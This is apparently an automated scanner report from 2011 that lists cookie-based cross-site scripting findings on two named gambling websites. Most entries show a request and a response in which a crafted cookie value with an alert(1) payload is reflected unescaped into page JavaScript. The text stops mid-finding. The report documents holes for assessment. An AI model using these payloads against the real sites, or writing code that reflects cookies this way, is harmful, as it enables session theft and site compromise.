HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMdfd2a" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47645 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMdfd2a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM82eb9"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51063 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM82eb9"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMb43be" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51063 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMb43be"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM3c7db"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44783 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM3c7db"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMf182d" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44783 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMf182d"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FM90668"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 107749 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM90668"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:30:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM798e6" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 107749 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM798e6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven Set-Cookie: BO=FMe5ddf"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44075 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMe5ddf"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.scratchcardheaven.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMbea86" Set-Cookie: BO=FM; domain=scratchcardheaven Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven Set-Cookie: CountryCode=US; domain=scratchcardheaven Set-Cookie: CSITemp=8; domain=scratchcardheaven Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44075 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMbea86"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | / |
GET / HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/ Set-Cookie: BO=FM7cec3"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34581 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM7cec3"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | / |
GET / HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM4230c" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34581 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM4230c"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/ Set-Cookie: BO=FMd2ded"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37486 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMd2ded"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM1f308" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37486 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM1f308"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Affiliates.aspx |
GET /Affiliates.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/ Set-Cookie: BO=FMb9c29"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35207 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMb9c29"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Affiliates.aspx |
GET /Affiliates.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM44017" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35207 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM44017"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Charity.aspx |
GET /Charity.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/ Set-Cookie: BO=FMcc1a2"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36070 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMcc1a2"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /Charity.aspx |
GET /Charity.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMbd193" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36070 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMbd193"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: BO=FM9c7ef"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM9c7ef"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM5eba4" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM5eba4"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/ Set-Cookie: BO=FMbbe0e"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMbbe0e"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.svenskalotter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:37:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM62361" Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/ Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/ Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM62361"-alert(1)- var strBonusOption = 